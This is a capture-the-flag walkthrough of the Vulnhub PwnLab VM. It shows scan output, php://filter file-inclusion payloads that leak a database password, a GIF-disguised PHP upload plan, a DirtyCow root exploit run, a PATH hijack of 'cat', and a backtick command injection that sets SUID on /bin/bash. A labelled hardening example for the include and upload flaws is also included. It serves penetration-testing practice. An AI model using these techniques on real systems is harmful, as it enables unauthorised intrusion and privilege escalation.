
Vulnhub-PwnLab

Target VM download link

0x01 Information Gathering

Nmap scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 01:03 EDT
Nmap scan report for 192.168.56.5
Host is up (0.0018s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 40816/udp status
| 100024 1 46341/udp6 status
| 100024 1 48803/tcp status
|_ 100024 1 54404/tcp6 status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 40
| Capabilities flags: 63487
| Some Capabilities: SupportsTransactions, Support41Auth, Speaks41ProtocolNew, IgnoreSigpipes, InteractiveClient, SupportsLoadDataLocal, LongPassword, ODBCClient, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsCompression, LongColumnFlag, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: #xU$OEH{UscwOc&0\aT^
|_ Auth Plugin Name: mysql_native_password

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds

Directory scan

gobuster dir -u http://192.168.56.5/ -w ~/tools/SecLists/Discovery/Web-Content/big.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.56.5/
[+] Threads: 10
[+] Wordlist: /tools/SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/07/12 14:00:13 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/config.php (Status: 200)
/images (Status: 301)
/index.php (Status: 200)
/login.php (Status: 200)
/server-status (Status: 403)
/upload (Status: 301)
/upload.php (Status: 200)
===============================================================
2020/07/12 14:00:25 Finished
===============================================================

0x02 Exploitation

As soon as you land on the site it looks like file inclusion. Comparing http://192.168.56.5/?page=login with the files found by the directory scan, the application evidently appends a .php suffix to the page parameter.

Read the source code to obtain the database connection password and the source of the other files.

Payload:
?page=php://filter/read=convert.base64-encode/resource=./index
?page=php://filter/read=convert.base64-encode/resource=./login
?page=php://filter/read=convert.base64-encode/resource=./config
config.php:
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
index.php:
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
upload.php:
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");

if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}

if(strpos($filetype,'image') === false) {
die('Error 001');
}

if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}

if(substr_count($filetype, '/')>1){
die('Error 003');
}

$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src=\"".$uploadfile."\"><br />";
} else {
die('Error 4');
}
}
}

?>

From auditing the code above we know the database connection password, and that if the cookie contains a lang key, index.php includes the corresponding file under the lang directory. The upload uses an extension whitelist and also checks the MIME type and the file header.

So it looks like we cannot upload a PHP file directly, but we can upload a PHP file with a .gif extension. File inclusion does not care about the extension of the included file: as long as the included file's content contains PHP code, it is parsed and executed as PHP.

So our steps are:

  1. Log in to the database and query the passwords.
  2. Log in to the site and upload the malicious gif file.
  3. Set the cookie: lang=path of the malicious gif
  4. Use index.php to include it

Inclusion succeeded.

Setting the cookie in AntSword (蚁剑)
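Hardening for the two defects the audit above found, as an added example (this is not the PwnLab code): the include path is chosen from an allowlist instead of concatenating $_GET['page'] or $_COOKIE['lang'], and uploads are stored under a random name, with the extension taken from the signature getimagesize() detected, in a directory outside the web root. The pages/ and lang/ layout, the /var/lib/pwnlab/uploads directory and the image.php serving handler are assumptions.

```php
<?php
// Added hardening example, not the PwnLab code. Assumed layout: pages/ and
// lang/ hold the includable files; UPLOAD_DIR is outside DocumentRoot.

// 1. Allowlisted includes. $_GET['page'] and $_COOKIE['lang'] only select a
//    key; the path itself never contains client input, so php://filter
//    wrappers and "../upload/<hash>.gif" can no longer reach include().
const PAGES = ['home' => 'pages/home.php', 'login' => 'pages/login.php',
               'upload' => 'pages/upload.php'];
const LANGS = ['en' => 'lang/en.lang.php', 'es' => 'lang/es.lang.php'];

function resolve_include(array $table, $key, string $default): string
{
    if (is_string($key) && array_key_exists($key, $table)) {
        return $table[$key];
    }
    return $table[$default];
}

// 2. Upload naming. The original kept the client's extension and stored the
//    file under upload/ inside the web root. Here the type comes from the
//    image signature getimagesize() detects, the name is random, and the
//    directory is not web-served, so a GIF carrying "<?php" is just bytes.
const UPLOAD_DIR = '/var/lib/pwnlab/uploads';
const IMAGE_EXT = [IMAGETYPE_GIF => 'gif', IMAGETYPE_JPEG => 'jpg',
                   IMAGETYPE_PNG => 'png'];

function stored_upload_name(string $tmpPath): ?string
{
    $info = @getimagesize($tmpPath);
    if ($info === false || !isset(IMAGE_EXT[$info[2]])) {
        return null;                 // signature is not GIF/JPEG/PNG
    }
    return bin2hex(random_bytes(16)) . '.' . IMAGE_EXT[$info[2]];
}

// index.php: unknown or missing values fall back to the defaults
include resolve_include(LANGS, $_COOKIE['lang'] ?? null, 'en');
include resolve_include(PAGES, $_GET['page'] ?? null, 'home');

// upload.php, after the session check and the $_FILES error check
if (isset($_POST['submit'])) {
    $name = stored_upload_name($_FILES['file']['tmp_name']);
    if ($name === null || !move_uploaded_file($_FILES['file']['tmp_name'],
                                             UPLOAD_DIR . '/' . $name)) {
        die('Not allowed, please upload images only.');
    }
    // Served back by an assumed image.php that reads UPLOAD_DIR and sends
    // the bytes with the detected Content-Type, never via a direct path.
    echo '<img src="image.php?id=' . htmlspecialchars($name) . '">';
}
```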

0x03 Privilege Escalation

After connecting with AntSword, pop a shell back to yourself. Of the passwords found in the database earlier, only these two users can be switched to:

  • kane
  • kent

Walkthrough-1

After information gathering, I ended up choosing a kernel exploit.

[email protected]:~/a$ gcc dc32.c -o cowroot -pthread 2>/dev/null
gcc dc32.c -o cowroot -pthread 2>/dev/null
[email protected]:~/a$ ls
ls
40616.c cowroot dc32.c ofs_64 pokemon.c
[email protected]:~/a$ ./cowroot
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 53112
Racing, this may take a while..
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
[email protected]:/home/kane/a# whoami
whoami
root
[email protected]:/home/kane/a# cd /root
cd /root
[email protected]:/root# cat flag.txt
cat flag.txt
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ \ | | (__ _)
( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) [email protected] - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'

Walkthrough-2

After switching to kane, you will find a binary named msgmike in his home directory. It is a SUID file owned by mike; it checks whether mike's home directory contains the mike file and then views that file.

Since we are currently the kane user, and the program does not hardcode the path to cat, we can consider hijacking cat through the PATH environment variable.

echo '/bin/bash' > /tmp/cat
export PATH=/tmp:$PATH
chmod +x /tmp/cat
./msgmike

At this point you should become the mike user.

And mike's home directory in turn contains a root-owned SUID binary. This program asks for input and then executes echo <user input> >> /root/msg.txt

So we can simply run ./msg2root and enter `chmod +s /bin/bash`; the backticks make chmod +s /bin/bash run first, turning bash into a root-owned SUID binary. Then, as the mike user, we can run bash -p to get root.

0x04 Summary

Whenever you have the chance to audit code, audit it carefully.